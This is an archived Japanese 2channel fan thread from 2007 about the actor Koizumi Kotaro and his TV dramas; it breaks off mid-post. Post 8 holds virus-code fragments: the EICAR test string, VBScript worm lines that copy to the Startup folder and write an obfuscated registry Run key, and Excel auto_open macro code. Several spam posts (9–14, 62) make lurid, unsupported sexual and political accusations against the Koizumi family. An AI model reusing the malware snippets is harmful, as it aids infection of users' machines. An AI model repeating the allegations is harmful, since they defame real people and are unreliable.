5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

小泉孝太郎王子その2

1 :通行人さん@無名タレント:2007/01/28(日) 00:28:00 ID:7fKewqDX0
現在、日本テレビ系水曜22:00〜『ハケンの品格』(里中賢介役)出演中!

まさに「王子」という言葉がピッタリ。
デビュー6年目、俳優として活躍を続ける小泉孝太郎さんのファンのためのスレです。
引き続き、マッタリ楽しく語りましょう。

小泉孝太郎公式プロフィール
http://www.jame.or.jp/izawa/koizumi.html

前スレ
小泉孝太郎王子その1
http://tv9.2ch.net/test/read.cgi/geino/1137482407

2 :通行人さん@無名タレント :2007/01/28(日) 00:31:37 ID:6C86IG620
ガンバ(大阪)!!アッラアアア〜!!!

3 :通行人さん@無名タレント:2007/01/28(日) 00:35:13 ID:WZyi2I3HO
>>1
乙でした〜!
これからも楽しく孝太郎を語って応援しましょう〜w

4 :通行人さん@無名タレント:2007/01/28(日) 03:21:20 ID:ajv/Q2VrO
もう そんなにしてるんだ 結婚したいな

5 :通行人さん@無名タレント:2007/01/28(日) 09:31:01 ID:PX0joSYT0
>>1
早速の新スレありがとうございます!
語り合えることが嬉しい。。。

6 :通行人さん@無名タレント:2007/01/28(日) 16:07:12 ID:KSBNlF0H0
>>1
新レスありがとうございました!
孝太郎さん、かっこよすぎ。あんな彼氏が欲しい。
でも本当に彼氏だったら毎日緊張してドキドキしすぎて大変かも。
ハケンの品格の里中主任も大好きです。
あんな上司がいる会社に就職したい。

7 :通行人さん@無名タレント:2007/01/28(日) 17:06:19 ID:Re+1Jra+0
年に2本か3本くらいしかドラマを観ない私が、今ハケンの里中主任に夢中だよ。
ドラマをいっさい見ないという人には勧めても見てくれないけど、私みたいに年
に数本見るような人には勧めているよ。

8 :通行人さん@無名タレント:2007/01/28(日) 20:41:34 ID:O37Dn03E0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


9 :通行人さん@無名タレント:2007/01/28(日) 20:42:14 ID:qQ08hll40
話は変わって、コイズミが代議士になってから、10年近くも通いつめてた
六本木のSMクラブは、今はなくなっちゃったけど、当時は東京のSMクラ
ブの老舗で、コイズミ以外にも、何人もの政治家や財界人たちがメンバーに
なってた。でも、ほとんどの政治家がマゾだったのに対して、生粋のサディ
スト、コイズミは、SMクラブのコースメニューにある通常のプレイでは満
足できずに、毎回、特別料金を払って、相手の女性が失神するまで、何時間
でも責め続けたそうだ。

当時、何度もコイズミの相手をしたことがあると言う女性は、「小泉先生の
お相手をすると、(激しく痛めつけられるため)2〜3日はクラブに出勤で
きなくなるので、そのぶんのお手当てもいただいていました」と語っている。
また、この女性によると、コイズミは、さんざん痛めつけた最後に、女性を
大の字に寝かせ、両方の二の腕を両足で踏みつけ、仁王立ちして、笑いなが
ら女性の顔面に放尿したそうだ。この女性は、その時の高笑いをするコイズ
ミの顔は、今でも決して忘れることはできないと言っている。

http://www3.diary.ne.jp/logdisp.cgi?user=338790&start=71&log=200501&maxcount=131


10 :通行人さん@無名タレント:2007/01/28(日) 20:43:55 ID:qQ08hll40
皆さん想像してみてください、日本の盗まれた未来を。

バレて写真週刊誌にキス場面をフォーカスされても人妻(ヤワラちゃんこと田村
亮子似w)との不倫を平然と続行した鬼畜のカマトト大根役者の小泉孝太郎君(大阪
の美人姉妹レイプ殺害放火事件の容疑者で5年前に実母を金属バットで撲殺して
最近まで少年院入りしていたパチンコ「ゴト師」の山地悠紀夫容疑者(22)と
瓜二つそっくりの容貌)と、「タダ借り」している高級乗用車で交通事故を起こすの
が得意だけどなぜか表沙汰にならないどす黒い暗闇の●泉進次郎君と、何度懇願
しても一度も父親に会ってもらえない宮●佳長君と、韓国パブ在日ママが生んだ
隠し子四男君たちが、狂牛病を発症する姿を。

そうなったらそれはいったい誰のせいでしょうか?


11 :通行人さん@無名タレント:2007/01/28(日) 20:45:44 ID:qQ08hll40
先代から北朝鮮系代議士の小泉家。
「地上の楽園」伝説のお先棒を担いで「帰国事業」の旗振り役を務め、
在日者だけでなくその日本妻や日本国籍の子10万人以上を北へ騙し
連れ去って収容所の露と消させた先代、小泉恂也。
北朝鮮に送金しまくって偽装破綻した朝鮮銀行の「救済」名目で血税
1兆4千億円を「強盗に追い銭」して北朝鮮の核武装開発資金をファ
イナンスした総連系3代目代議士の小泉純一郎。


12 :通行人さん@無名タレント:2007/01/28(日) 20:57:56 ID:qQ08hll40
【週刊現代 2005/12/24号 巻頭記事】 栗本慎一郎 : 「パンツをはいた純一郎」(全文)
http://www.asyura2.com/0510/senkyo17/msg/912.html

小泉純一郎の首相資質考
http://www.marino.ne.jp/~rendaico/2003seihendrama/koizumiseikenco.htm

小泉純一郎の研究 小はん変死の真相
http://www.pressnet.tv/log/view/6172


13 :通行人さん@無名タレント:2007/01/28(日) 20:58:49 ID:qQ08hll40
小泉サイコパス売国奴の恥辱尻振り外国漫遊「卒業旅行」のために
あたら血税8億円強がドブに捨てられたんだってね。世も末だね。
首相でなくなってから勝手に自分の金で行けよな!

あの馬鹿売国奴は、イタリアに移住するかも知れないんだってw
「辞めたら何もやらない。スッカラカンになる。そうしたらイタリ
アに行きたい。本場のオペラが見られるし、食事だって旨いし、
なんてったって、ふふふ、女がいいだろ」(小泉純一郎)などと
繰り返しホザいているそうだ。国民のため一刻も早く辞めろよな。

実際、実姉相姦の小泉信子が、イタリアに1週間、移住の下見に
行ったんだって!w竹中犬ポチ売国奴がアメリカに亡命し、小泉
犬ポチ売国奴はイタリアに逃亡かよw本場のオペラは日本語字幕
はないぞw登場人物が全員死亡する筋書きのオペラを見終わって
舞台上に呼ばれて「ラブ・イズ・ベスト!」と叫んで観客全員を唖
然とドン引きさせた馬鹿小泉は、未だオペラ好きのフリを続ける
つもりかw

それにつけても、馬鹿丸出しなのは小泉信者馬鹿売国奴愚民だなw


「辞めたら何もやらない。スッカラカンになる。そうしたらイタリ
アに行きたい。本場のオペラが見られるし、食事だって旨いし、
なんてったって、ふふふ、女がいいだろ」(小泉純一郎)


14 :通行人さん@無名タレント:2007/01/28(日) 21:01:43 ID:qQ08hll40
小泉詐欺師インチキ内閣によるヤラセ質問のタウンミーティングって本当に酷いね。
5年間に行われたタウンミーティングのことごとくがヤラセ質問で情報操作されてた
んだね。小泉詐欺劇場の舞台装置のからくりだね。何が政府と国民との直接対話だ?
こうやって捏造された「世論」に、頭の悪い愚民が騙されて、熱烈支持などして衆愚
政治ができあがるわけだね。騙されて「常に使い捨てにされる」小泉犬ポチわんわん
信者は、いったい何時になったら真実に目覚めるのだろうか?
_______________  ____
|電通 タウンミーティング      || 検 索 |
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄   ̄ ̄ ̄ ̄


15 :通行人さん@無名タレント:2007/01/28(日) 21:55:10 ID:7fKewqDX0
>>6
里中賢ちゃん、良いよねw
私もあんな上司が職場にいたら喜んで残業させてもらいますw
でも現実にはあんな素敵な30歳、周りにはいないよな〜
いたらリアルで惚れてしまいますwww

16 :通行人さん@無名タレント:2007/01/28(日) 23:03:53 ID:WZyi2I3HO
里中くんが上司だったら自分から残業志願してしまいそうw里中くんに夢中ってわかる。
以前は孝太郎に興味なかった人も注目してくれるようになった。
1年ちょっと前の自分みたいw

17 :通行人さん@無名タレント:2007/01/29(月) 09:49:39 ID:V6Rl16E80
不信のときの放送前と放送後ではレスの多さが全然違っていた。やっぱり、去年
あたりからブレイクしてるように思う。マスコミは絶対に認めようとしないけど
ね。
一人でも多くの人にドラマを見てもらいたいから勧めているけど、もうキムタクの
ドラマ以外は眼中にないというような人には何を言ってもダメだった。

18 :通行人さん@無名タレント:2007/01/29(月) 15:47:00 ID:AJG4e+tO0
声はお父さん似

19 :通行人さん@無名タレント:2007/01/29(月) 20:14:18 ID:a/7iT7yMO
多くの人に見てもらいたいけど゙ラマファンの中で孝太郎の評価が良い方に変われば嬉しい。
声がパパに似てるという話は時々聞くね。実は私は1度も思った事がない。
5年も務められたのにちゃんと見て(聞いて)なかったのかも〜

20 :通行人さん@無名タレント:2007/01/29(月) 23:24:00 ID:YkaDOais0
声が似ているとか仕草が似ているとかお父様も手がきれいだとか色々聞くよね。
総理としてのお父様には全く興味がなかった私も見ていなかった、気が付かなかった事が多くて。
今となってはほとんどメディアに露出しないので似ているというところがわからない。
もちろん親子だという事はわかっているのだけど画面で孝太郎を観てお父様を思い出すとか
逆にお父様を観て孝太郎を連想するとかはほとんどなかったです。
公人としてではなく、孝太郎のお父様として興味を持った今なら観察してみたいんだけどねw

今夜の「The孝太郎」のゲストは田中美佐子さんですね〜
個人的に好きな女優さんだし気さくでさっぱりとした性格なので孝太郎とも
気が合うのではないかとトークに期待してますw

21 :通行人さん@無名タレント:2007/01/29(月) 23:45:33 ID:a/7iT7yMO
今回のゲストは田中美佐子さんでしたね〜私も好きです。
いしだあゆみさんの時は2回とも見逃してしてしまってショックだったけど今夜こそは!w

22 :通行人さん@無名タレント:2007/01/30(火) 00:26:42 ID:9ZWOOtjZ0
笑った横顔と指の美しさと手の仕草と歩き方がお父様ソックリです。


23 :通行人さん@無名タレント:2007/01/30(火) 02:52:54 ID:z0AhbTXT0
孝太郎ラボにゲストとして出演したサトエリ(佐藤江梨子)はあまり資料を参考にしないで話すという小泉孝太郎に対して
「もっと資料を読め」
「ゲストにしゃべらせないでもっと質問しろ」
「自分の名前がついてる番組なんだからもっと大切にしろ」
他にも話を聞く姿勢がなってない(前かがみになれ)など罵詈雑言を(しかもタメ語で)浴びせかけた。


24 :通行人さん@無名タレント:2007/01/30(火) 11:14:26 ID:kK5lZ3Vc0
サトリエはSっぽいからね。おっとりした男を見ると、ついついサドっぽくなって
しまうんだろうね。個人的にはキツい女の子は苦手。孝太郎はああいうキツい子は
好みなんだろうか?

25 :通行人さん@無名タレント:2007/01/30(火) 21:26:02 ID:6dyK2ml60
派遣で801
http://sakura03.bbspink.com/test/read.cgi/801/1169797533/

26 :通行人さん@無名タレント:2007/01/30(火) 22:00:03 ID:i3fe6IhZO
>>22
今度機会があったら観察しておきますw

美佐子姉さん、意外にもお酒飲めないんだな〜酒の話で盛り上がるかと思っていたのに。
孝太郎…結婚願望ないと言いながら結婚生活とかきっかけとか熱心に聞いてるしw
気になる相手でもいるのか?

27 :通行人さん@無名タレント:2007/01/30(火) 23:02:00 ID:w0LGLJ6i0
>>22
屈託なく笑った満面の笑顔の孝太郎が1番好きな私としては気になるところ。
いつになるかわかりませんが、今度お父様をどこかで見かけたらチェックしておきますw

>>26
孝太郎じゃないけど私も田中美佐子さんが飲めないというのは意外だった。
孝太郎の「夜に情熱を燃やす」という発言には大笑い。お酒以外も関係してる?w
初対面同士でも意外と話は盛り上がってたよね。 海外のVTR以外の話題でw
話のきっかけ作りに海外Vを流しているのかもしれないけどあまり意味がない時も多い。
いしだあゆみさんの時もそうだけどトークが盛り上がったりゲストの素がわかるのが面白い。

28 :通行人さん@無名タレント:2007/01/31(水) 16:00:25 ID:iiSO1kX60
田中美佐子さん「誰と結婚するんだろうね〜」とも言ってましたね。
孝太郎さん「僕も知りたいですね〜」と言っていたけど私も知りたいですw

今日はハケンの品格の里中主任に会える水曜日ですね。
里中主任も孝太郎さんも大好き。かっこ良すぎと思う。

29 :通行人さん@無名タレント:2007/01/31(水) 20:32:19 ID:l+t1qom80
ハケンの孝太郎も好きだけど、いつかまた交渉人みたいに笑わない役もドラマで
やってほしい。いろいろな孝太郎が見てみたいな。

30 :通行人さん@無名タレント:2007/01/31(水) 22:53:07 ID:WYtREO7vO
孝太郎は今すぐの結婚願望はなくても結婚に対する考えが変わってきているのかもね。
もちろんいろんな役を演じる孝太郎を見たいよ。交渉人(踊る〜)の小池キャラは私も好きw
それにしてもクルクルパーマを応援する里中くん…切ないねぇ。

31 :通行人さん@無名タレント:2007/01/31(水) 23:04:20 ID:k+36F39e0
私も「交渉人〜」の小池キャラの孝太郎は好きだな。
この作品も映画は観ていなくてTV放送で初めて観たけどはまってしまったw
メガネも似合っていたし、小池を演じている時に出す孝太郎の声も個人的に好みw
この1年はいろんなタイプの役を演じて来たからこれからも役柄の幅は広がると思う。
とりあえず今はやっぱり「ハケン〜」賢ちゃんに夢中ですw

32 :通行人さん@無名タレント:2007/02/01(木) 00:04:35 ID:Yfgz4V/s0
今日久しぶりに孝太郎みたら、とても上手になってた。
大河の主役とか早くやって欲しい。

33 :通行人さん@無名タレント:2007/02/01(木) 07:23:30 ID:38PFYMun0
本当に孝太郎は演技が上手になったと思う。
まだファンでなかった頃に観ていたおぼつかない演技がウソみたい。
いつかもし大河の主演をやるような日が来たらすごく幸せなんだけどw

34 :通行人さん@無名タレント:2007/02/01(木) 20:10:19 ID:VtZdQ+8HO
孝太郎は去年1年でいろんな良い出会いがあったのかもね。
厳しく演技指導してボロクソに言ってくれる監督との出会いなんて貴重だと思う。
孝太郎の演技が上達してるのもそんな理由もあるのかなと思う。
里中くんはキャラだちするようなタイプではないけど孝太郎が見せる表情はすごくいいと思う。

35 :通行人さん@無名タレント:2007/02/01(木) 20:33:44 ID:W9fbNaPU0
確かに、キャラ的には弱い。でも、ドンチャン騒ぎのようなドラマであの役は
貴重。女のボケ役加藤あいと、男のボケ役小泉孝太郎がクッションのように
なってる。加藤あいの「ああ〜、ごめんなさい〜」と孝太郎の「大丈夫ですか
ぁ〜、大前さぁん」(大前が熱を出して倒れた時)の口調がどことなく似てい
る。

36 :通行人さん@無名タレント:2007/02/01(木) 20:59:58 ID:Wi8EtG7O0
孝太郎は要人の子息として今まで誘拐されなかったのが不思議だ

37 :通行人さん@無名タレント:2007/02/01(木) 23:00:20 ID:38PFYMun0
決して強烈な個性を持ったキャラではない普通の好青年の賢ちゃんを観ている人に
好感を持たれる様に賢ちゃんの良さが伝わるように演じるのはそんなに簡単じゃないと思う。 
そういう意味でも孝太郎はうまく演じてるし、孝太郎に合った役だと思うな。
賢ちゃんが東海林さんと大前さんを見つめる表情とか・・キュンとする。
役者としての表情が豊かになったね。 今後がますます楽しみ!
「ハケン〜」は登場人物のキャラもバランス良く配置されていると思うな。
視聴率も相変わらず好調で4回目はとうとう20%超え!

38 :通行人さん@無名タレント:2007/02/02(金) 00:09:02 ID:VtZdQ+8HO
とうとう20%超ですか!好調で嬉しい限り。
来クールのドラマのラインナップもボチボチ発表始まってるけど去年を考えたら当然次クールも連投アリだよね。
気が早いけど早くも次も気になるよ〜

39 :通行人さん@無名タレント:2007/02/02(金) 00:19:55 ID:+LPYDAfE0
>>38
石原さとみ主演のフジ火9時らしい。
錦戸亮、白石美帆も共演済みの人たちも一緒だから現場は又楽しくなるだろうけど
大丈夫かなあ。ハケンが良すぎてその反動が心配。

40 :通行人さん@無名タレント:2007/02/02(金) 00:20:50 ID:D0EWr/rh0
>>38
4月期ドラマ予想スレで、火09 石原さとみ 錦戸亮 白石美帆 小泉孝太郎
っていう情報が落ちていたけど、どんなドラマになるんだろう。
ちと不安・・・

41 :通行人さん@無名タレント:2007/02/02(金) 00:21:47 ID:D0EWr/rh0
>>39
あら、かぶちゃった(´▽`)

42 :通行人さん@無名タレント:2007/02/02(金) 00:48:48 ID:+LPYDAfE0
>>41
なかよしこよしデス
4月期ドラマかなり不安。

43 :通行人さん@無名タレント:2007/02/02(金) 07:22:50 ID:RhLeVY6T0
>>39-40
情報ありがとう!
今のところは出演予想なんですかね?
テレビ誌etcの情報も来週辺りには出るかしら・・
共演者もだけどドラマの内容は気になるな〜


44 :通行人さん@無名タレント:2007/02/02(金) 22:39:27 ID:BCbY8xB7O
来期のドラマ情報サンクスでした!
石原さとみちゃん、若手の女優さんの中では演技力あると思っているんだけど。
孝太郎と白石美帆は同世代、さとみちゃんと錦戸くんは年下…
ドラマの内容はどんな感じか気になるな〜あまりアイドル路線でないと良いな。

45 :通行人さん@無名タレント:2007/02/02(金) 23:38:40 ID:RhLeVY6T0
孝太郎と白石美帆さんが共演済みでさとみちゃんと錦戸くんも共演済み。
孝太郎と錦戸くんも連ドラアテプリの最終回ではいい感じの関係だった。 
知り合い同士が多い現場だから楽しくて良い雰囲気になりそうかな?w
私もさとみちゃんは若手女優さんの中では演技出来ると思うし個人的に嫌いじゃない。
ただドラマはやっぱりストーリーが重要。どんなドラマになるのか全く知らないのだけど
例え若い子向けのドラマだとしても共感出来る内容だと良いなと期待しておく。

46 :通行人さん@無名タレント:2007/02/03(土) 00:30:39 ID:3iw6eVEQ0
アンテナK聴いた人いませんか?

47 :通行人さん@無名タレント:2007/02/03(土) 07:08:07 ID:aUOhtt320
>>46
レポしてあげられたら良いんだけど・・聴けない地域の住民なので。。
お役に立てずに残念です〜


48 :通行人さん@無名タレント:2007/02/03(土) 10:04:24 ID:xGFVAJXjO
他スレでレポしてくれている方がいますね。ありがたいです。
次クールのドラマの内容気になる。
年齢的に孝太郎と白石さんはさとみちゃん達の職場の先輩か兄・姉って感じだよね…

49 :通行人さん@無名タレント:2007/02/03(土) 13:05:25 ID:3iw6eVEQ0
他スレのレポ読みました。本当にありがたいです。
4月期のドラマも楽しみですね。

50 :通行人さん@無名タレント:2007/02/03(土) 15:43:33 ID:GHgOulEP0
孝太郎カワユス

51 :通行人さん@無名タレント:2007/02/03(土) 16:55:05 ID:iNpfwR3x0
たぶん、アイドルドラマだと思う。でも、石原さとみは男の子にすごく人気が
あるから、ストーリーがアイドル路線の方が視聴率が取れるかも。視聴率がす
べてではないんだけどね。


52 :通行人さん@無名タレント:2007/02/03(土) 17:15:57 ID:0xIyIWzd0
4月からも連ドラ出演ありなんですね?ドラマで見られるのはうれしいです。
いつか田畑智子ちゃんと共演して欲しいな。
今週のテレビ誌に孝太郎くんと大泉さんが花束を持った写真付きのインタビューが
掲載されていましたが写真の孝太郎くんはまさに王子様のようでしたw

53 :通行人さん@無名タレント:2007/02/03(土) 21:05:04 ID:xGFVAJXjO
>>52
まさに王子でしたねwあの笑顔で花束をもらったら間違いなく即落ちw
私も田畑のともちゃんとの共演はぜひ見たいな〜
1クールの連ドラとまでの贅沢は言わないから単発か2-3回程度のドラマかCMで見たいな。
今日実家に帰ったらとっていないはずの見慣れない朝日新聞がありました。
孝太郎が載っているからと弟が持って来てくれたらしい。笑顔の孝太郎、やっぱイイ!

54 :通行人さん@無名タレント:2007/02/03(土) 22:22:22 ID:aUOhtt320
わざわざ実家に持って来てくれるなんて優しい弟さんですね〜うらやましい!
私は孝太郎の写真付き記事が載っていると知りキオスクで一部買いをしてしまいましたw
先日の日経は顎に手を当てている仕草がツボでしたが今日の朝日は笑顔の孝太郎が素敵w

先日のTV LIFEでのレモンクリーム色の花束を持った孝太郎はまさに王子様ですよね。
思わず花束をもらう自分を妄想してしまう痛い自分がいました・・orz

智ちゃんとの共演は私も強く希望ですw ドラマ・CM・孝太郎の番組でのトーク、
ドラマが1番嬉しいけどどんな形でも良いからもう1度観たいな。
観ていて心地よさを感じる2人が持っている空気感みたいなものがすごく好きなので。
2人の育ちの良さが影響しているのか自分にはないものなで尚更そう感じるのかもしれないな〜

55 :通行人さん@無名タレント:2007/02/04(日) 12:20:34 ID:iN0vkrRPO
>>54
妄想は自由ですよw
ハニカミの後から私が孝太郎を良いと言い出してから
呆れながらも家族も気にしてくれているみたいですw
田畑のともちゃんとの2人の空気感が好きだというのわかるな〜
時々無性にハニカミの録画を見たくなるんですよね。
ハケンの里中くんも顎に手をやる仕草があるけど私も好きですw

56 :通行人さん@無名タレント:2007/02/04(日) 13:00:45 ID:FaNISs460
カワイイ王子

57 :通行人さん@無名タレント:2007/02/04(日) 15:52:06 ID:bLNnYfyR0
先日ラジオで恵方巻きについて
「みんな知ってる?知ってるの?コンビニでも売ってるの?
 こういうの俺だけ知らないとかだったら嫌だなあ、世間知らずがばれちゃいそうで」と
言っていましたが、もうとっくの昔にばれちゃってますから!
関東でも3年くらいまえから出始めたのに孝太郎坊ちゃまときたらw
感心したのが豆まきをひとり暮らしをするまでは毎年家でやっていたということ。
流石小泉家って感じですが、うちがやらないだけかな。

智ちゃんとの共演あるといいですね。



 

58 :通行人さん@無名タレント:2007/02/04(日) 16:54:30 ID:r9hE8YIU0
今回のドラマ、20%超えでうれしいかぎりだが、最終回でどれくらい取れるかが
心配。このまま、20%をキープし続けてくれないかな〜。

59 :通行人さん@無名タレント:2007/02/04(日) 16:58:38 ID:Nnuqpphi0
バカくさい


60 :通行人さん@無名タレント:2007/02/04(日) 17:30:27 ID:s/ObCABP0
「ハケンの品格」の里中主任が大好きなんですが次のドラマも気になります。
どんなドラマなのか内容の発表はあったのでしょうか?
孝太郎くんのラジオは聴けないのですが恵方巻きについて話していたんですね。
私も3〜4年前に初めて知ったのですが最近はコンビニでも売っているし。
今年まで知らなかったというのは孝太郎くんらしいようなw
私も実家を出るまで毎年豆まきをしていたので共通点があってちょっとうれしいです。
田畑智子ちゃんとのハニカミはもう1度見たいので再放送希望なのですが難しそうで残念です。

61 :通行人さん@無名タレント:2007/02/04(日) 18:43:45 ID:sYOtyS830
>>57
うちの場合、家族仲とか普通だけど豆まきは小学校以来やってませんよ。
でも小泉家のエピソードを知るたびに羨ましいと思う。
変なテレとかなく普通にやってるとこイイですね。


62 :通行人さん@無名タレント:2007/02/04(日) 19:55:51 ID:3akUj+8F0
小泉馬鹿売国奴純一郎が解禁した人買い製造業派遣会社。

その小泉の馬鹿息子のカマトト大根役者がしたり顔して
派遣会社を舞台にしたテレビドラマに出ていて、それを
馬鹿な小泉信者馬鹿売国奴たちが囃し立ててるという図
は、日本社会の末期的状況を如実に物語っているよね。



63 :通行人さん@無名タレント:2007/02/04(日) 22:27:01 ID:vypXLM3Y0
>>57
ラジオは聴けないのですが写真の楽しみもあってAntena Kのサイトは時々覗いています。
恵方巻きの事も書かれていましたがラジオでの孝太郎の様子(反応)がわかって嬉しいですw
大人になっても豆まきをやっていた習慣を大切にしそうな小泉家なので関西に住んでいたら
恵方巻きの事も当然知っていたでしょうね。

>>60
私はこのスレで次クールのドラマ出演があるらしいと知りましたが正式発表はまだのようですね。
ドラマ予想板を少し覗いてみたら「ハチクロ」(ハチミツとクローバー)という噂がありました。
一方で孝太郎や白石美帆さんに合う年齢がないから違うだろうという意見もありましたが。
でも孝太郎に関しては大学8年生という設定の登場人物がいるので合わない事もないような?
これはあくまでも噂の段階だと思います。 正式の発表が待ち遠しいですねw

64 :通行人さん@無名タレント:2007/02/04(日) 23:28:55 ID:iN0vkrRPO
>>57
ラジオの話ありがとです!孝太郎は少しおバカに思えるところも魅力ですねw
数年前まで関東では恵方巻きって馴染みがなかったし季節物だからかな?
>>58
視聴率が好調で嬉しい限りだけどハケンは極端に数字が下がりそうにないしもう十分かも。
それより最終回まで楽しく見られるように今のクオリティを保って欲しい。
>>60
私もともちゃんとのハニカミ再放送希望組なんです。ビデオ録画なので劣化が激しくてorz
リクエストも多いと思うんだけど。DVD化でも良いから実現して欲しいくらい。

65 :通行人さん@無名タレント:2007/02/05(月) 09:56:09 ID:ffukZT3o0
次回作が不安。ストーリーがつまんなかったら、1話で見るのをやめてしまうかも。
今までも、1話で見るのをやめてしまったドラマがたくさんあるから。高視聴率じゃ
なくてもいいから、最後まで見られるドラマを作ってほしい。


66 :通行人さん@無名タレント:2007/02/05(月) 10:38:00 ID:SjBYjnFT0
予想板にハチクロありましたね。美大生の役となると・・・
その為に髪の毛を伸ばしてる?
ハケン見るたびに髪の毛もっと短くしてスッキリしたほうがいいのにと
思っていて、でももしかしたら交渉人があるのかなという期待もあったのに。
漫画原作となるとイメージ云々でけっこう厳しいから大変そう。

67 :通行人さん@無名タレント:2007/02/05(月) 21:01:09 ID:gTvu01ZnO
連ドラってある意味初回が命というとこあるよね。
ドラマ好きの自分は最終回までダラダラ見る事が多いけどねw
ハチクロ以外にもスター誕生という話もあるみたいだね。発表楽しみ。

68 :通行人さん@無名タレント:2007/02/05(月) 23:10:30 ID:msPBpjzv0
確かに連ドラは「初回命」だと私も思う。初回はチェックの意味で観る人も多いし。
初回の視聴率が良くても2回目から落ちてしまうドラマは初回の出来が今ひとつなんだろうね。
私も昔からドラマ好きでもう良い年なのに今でも若い子向けのドラマも観てたりしますw

賢ちゃんの髪型については私ももう少し短い方がすっきりして良いと思ってました。
次回ドラマの役作りのためというセンもアリかもしれないですね? 次回作、気になりますね〜w

孝太郎と智ちゃんのハニカミがDVD化されたら録画している私もお金払って買ってしまうと思うw

69 :通行人さん@無名タレント:2007/02/06(火) 00:22:15 ID:3RjJI3On0
そろそろ等身大のラブストーリーを見たい。

70 :通行人さん@無名タレント:2007/02/06(火) 09:51:27 ID:CUeoPs/X0
第1話の30分ぐらいで見るのをやめてしまう人もいるくらいだから、今のドラマ
は厳しいね。だから、4月のドラマって心配だよ。最近はバラエティファンの方が
多いからから、ちょっとでもつまんなかったらすぐにチャンネルを変えられてしま
う。私の友達なんて、バラエティのCMの合間にドラマ見てるくらいだから。
ハケンの品格みたいに安心して見られるドラマがいいな。ハケンは最終回まで楽し
んで見られそう。

71 :通行人さん@無名タレント:2007/02/06(火) 11:52:23 ID:3RjJI3On0
昨夜の田中美佐子ねえさん相変わらずざっくばらんで面白かった。
孝太郎に対して「結婚しなさそーしても離婚しそー」には笑った。
その時の孝太郎の「やめて下さいよw深夜でもみてるんですから」っていうのは
茶の間を指してるのか特定の人を指してるのかわからなかったんだけど。
大勢の人がみてるんですからという解釈でいいのよね。
ズボラだとか一晩風呂に入らなくてもOKとか髪の毛洗わないでそのまま寝て
スタイリストさんに「洗って下さいよ」と言われるとかイメージがwwww
美佐子ねえさんの中ではそんな孝太郎の好感度UPw

72 :通行人さん@無名タレント:2007/02/06(火) 12:35:53 ID:zpXj4fla0

イザワ・・いい加減にしろよ!!
甘い汁を吸うために、画策において抱え込み・・・


バカ親父ともども
この青なり病痰を画面から排除せよ!!

73 :通行人さん@無名タレント:2007/02/06(火) 20:58:52 ID:m6yzVlsUO
孝太郎と智ちゃんのハニカミは特典映像付きで販売したら意外と売れると思うんだけどなw
等身大のラブストーリー見たいね。でも相手役によっては小姑になりそうな自分がいますw
美佐子姉さん、やっぱり好きだわ。初対面でも孝太郎も話しやすかったんじゃないかな?
孝太郎は他の番組で家のお風呂は好きじゃないと言ってたよね。
でもやっぱり几帳面なイメージがある。ズボラなイメージはないな〜

74 :通行人さん@無名タレント:2007/02/06(火) 23:03:30 ID:Mt4PbGYA0
孝太郎は間違いなくラブストーリーいけるよね。
去年の12月にしずちゃんと次課長の河本さんがW主演でドラマやった時には
孝太郎と智ちゃんでやって欲しかったと本気で思ったものだけど・・
クリスマス時期に可愛いラブストーリーが観たいのですがw

田中美佐子さんの「(結婚しても)離婚しそう」のツッコミには大笑いw
「そんな事言わないで下さいよぉ」と情けない感じで言う孝太郎・・
「聞かれたくない相手が観てるの?」と画面にツッコミを入れた自分がいましたw

75 :通行人さん@無名タレント:2007/02/07(水) 01:05:44 ID:oqi6OHrY0
美佐子姉さんw若い頃はちょっと生意気な小悪魔風の女優さんだったけど
気さくな感じで良かった。ゲストが孝太郎と気があってトークが盛り上がると
番組も面白い。

ラブストーリー、誰が相手でも小姑目線になりそw
小姑といえば今もそうかも。噂になった人のHPとか必ずいくもん。
でね、一番長く噂になった歌手の人のラジオのHPに行ってみたのね。
その人がイラストを書いてるんだけど1月22日をクリックすると
あらまぁ、イラストの男の子誰かに似てるようなw
足の大きさとか特徴がよく出てるカモ。友達は考えすぎだよと笑ってたけど。

76 :名無しさん@お腹いっぱい。 :2007/02/07(水) 02:44:28 ID:KInZCcoF0
>>71
特定の人をさしてるとすればお父さんでは?
孝太郎の出てる番組は一通り見るようにしてるみたいだし
・・・離婚してるし。

77 :通行人さん@無名タレント:2007/02/07(水) 07:21:30 ID:CZsUnvz20
「はなまるカフェ」に出演していた時の自宅台所の写真とか台本をきれいに使うとか
やっぱり几帳面なイメージもありますね〜 神経質という事はないのだと思うけど。。

今日は初レモン表紙の発売日ですね! 次回のドラマも発表になったりするかしら?
いずれにしても楽しみです〜w

78 :通行人さん@無名タレント:2007/02/07(水) 16:49:09 ID:T+h+0FyN0
お父さんの前では「離婚」の話は先輩議員でさえしないらしいからね。かなり、
前の奥さんのことには気を使ってるらしい。だから、孝太郎も気を使ってるん
だろうね。
総理大臣になるずいぶん前、島田紳助の番組に出たことがあるらしいけど、その
時「どんな質問をしてもいいけど、元妻の話だけは絶対にしないでくれ」って
言ったそうだから。紳助はそれを行列ができる法律相談事務所で言ってた。

79 :通行人さん@無名タレント:2007/02/07(水) 17:10:54 ID:wP9dcLBvO
さとみちゃんのファンの者です。あがってたので書き込ませていただきます。
小泉さんは爽やか系で嫌味がないイケメンで僕だけのマドンナの時から
